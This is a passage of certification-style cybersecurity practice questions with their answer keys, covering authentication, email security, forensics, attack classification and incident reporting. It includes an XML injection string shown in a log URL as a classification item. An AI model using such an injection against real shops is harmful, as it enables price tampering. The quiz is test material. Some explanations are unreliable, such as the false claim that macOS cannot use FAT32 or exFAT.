C. 10.0.19.121 is a client accessing an SSH served over port 52497
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (Select 3)
A. Conduct a penetration test against the organization’s IP space
B. Require two-factor authentication for access to the application
C. Whitelist all specific IP blocks that use this application
D. Rename the URL to a more obscure name
E. Require an alphanumeric passphrase for the application’s default password
F. Change the username and default password
B. Require two-factor authentication for access to the application
C. Whitelist all specific IP blocks that use this application
F. Change the username and default password
Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name?
A. DKIM
B. DMARC
C. SMTP
D. SPF
A. DKIM
You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter?
A. exFAT
B. HFS+
C. NTFS
D. FAT32
B. HFS+
Hierarchical File System Plus
macOS doesn’t support FAT32 and exFAT
You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM:
https://www.diontraining.com/add_to_cart.php?
itemld=5”+perltemPrice=”0.00”+quantity=”100”+/>
A. SQL injection
B. Session hijacking
C. Buffer overflow
D. XML injection
D. XML injection
XML injection manipulated or compromises the logic of an XML application or service.
You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack’s target?
A. 443
B. 389
C. 21
D. 3389
A. 443
After 9 months of C++ programming, the team at Whammiedyne systems has released their new software application, Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor at the cost of $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects?
A. DevOps
B. Waterfall Model
C. DevSecOps
D. Agile Model
C. DevSecOps
Which of the following is the most important feature to consider when designing a system on a chip>
A. Space and power savings
B. Ability to interface with industrial control systems
C. Type of real-time operating system in use
D. Ability to be reconfigured after manufacture
A. Space and power savings
You are a cybersecurity analyst working for an accounting firm that manages the accounting for multiple smaller firms. You have successfully detected an APT operating in your company’s network that appears to have been there for at least 8 months. In conducting a qualitative assessment of the impact, which of the following factors should be most prominently mentioned in your report to your firm’s executives? (Select 2)
A. Downtime
B. Recovery time
C. Data integrity
D. Economic
E. Detection time
C. Data integrity
D. Economic
The Pass Certs Fast corporation has recently been embarrassed by several high profile data breaches. The CIO proposes improving the company’s cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach?
A. This approach only changes the location of the network and not the attack surface of it
B. This is a reasonable approach that will increase the security of the servers and infrastructure
C. The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration
D. This approach assumes that the cloud will provide better security than is currently done on-site
A. This approach only changes the location of the network and not the attack surface of it
You have been asked to scan your company’s website using the OWASP ZAP tool. When you perform the scan, you received the following warning:
“The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved.”
You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:
<form>
Enter your username: <br></br>
<input></input><br></br>
Enter your Password: <br></br>
<input></input><br></br>
<input></input>
</form>
Based on your analysis, what action should you take?
A. You recommend that the system admin disables SSL on the server and implements TLS instead
B. You tell the developer to review their code and implement a bug/code fix
C. You recommend that the system admin pushes out a GPO update to reconfigure the web browsers security settings
D. This is a false positive, and you should implement a scanner exception to ensure you don’t receive this again during your next scan
B. You tell the developer to review their code and implement a bug/code fix
Jack is assessing the likelihood of reconnaissance activities being performed against his organization. Which of the following would best classify the likelihood of a port scan being conducted against his DMZ?
A. None
B. High
C. Medium
D. Low
B. High
An organization utilizes a BYOD policy with its employees. This allows the employees to store sensitive corporate data on their personally owned devices. Which of the following occurred if an employee accidentally left their device in the back of a taxi?
A. Failed data loss prevention
B. Failed deperimeterization management
C. An advanced persistent threat
D. A data breach
B. Failed deperimeterization management
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?
A. SQL injection
B. Buffer overflow
C. Denial of service
D. Cross-site scripting
A. SQL injection
An organization has hired a cybersecurity analyst to conduct an assessment of their current security posture. The analyst begins by conducting an external assessment against the organization’s network to determine what information is exposed to a potential external attackers. What technique should the analyst perform first?
A. Enumeration
B. Intranet portal reviews
C. DNS query log reviews
D. Technical control audits
A. Enumeration
Which of the following will an adversary do during the weaponized phase of the Lockheed Martin kill chain? (Select three)
A. Obtain a weaponizer
B. Conduct social media interactions with targeted individuals
C. Select a decoy document to present to the victim
D. Harvest email addresses
E. Select backdoor implant and appropriate command and control infrastructure for operation
F. Compromise the targets servers
A. Obtain weaponizer
C. Select a decoy document to present to the victim
E. Select backdoor implant and appropriate command and control infrastructure for operation
Which of the following vulnerabilities was the MOST critical due to its high potential impact and exploitability?
A. Stagefright
B. Shellshock
C. Logjam
D. Drupalgeddon
B. Shellshock
Which of the following is the difference between an incident summary report and lessons-learned report?
A. Both a lessons learned report and an incident summary report are designed for a technical audience
B. A lessons-learned report is designed for a non-technical audience
C. Both a lessons learned report and an incident summary report are designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience
After a sophisticated spear-phishing attack compromised your organization’s financial database, the incident response team engages in a meticulous examination of the event. They aim to preserve and scrutinize digital evidence, uncover the exact method of the breach, and gauge its impact on your organization. What is this meticulous post-incident examination known as?
A. Lessons learned
B. Incident response plan
C. Forensic analysis
D. Root cause analysis
C. Forensic analysis
During an incident response, your team identified that an attacker performed a scan on your network, then delivered malware via a phishing email, which was exploited to install a backdoor on the system. The attacker then executed commands to exfiltrate data. Which framework would BEST represent this attack sequence?
A. Cyber Kill Chain
B. MITRE ATT&CK
C. OWASP Testing Guide
D. Diamond Model of Intrusion Analysis
A. Cyber Kill Chain
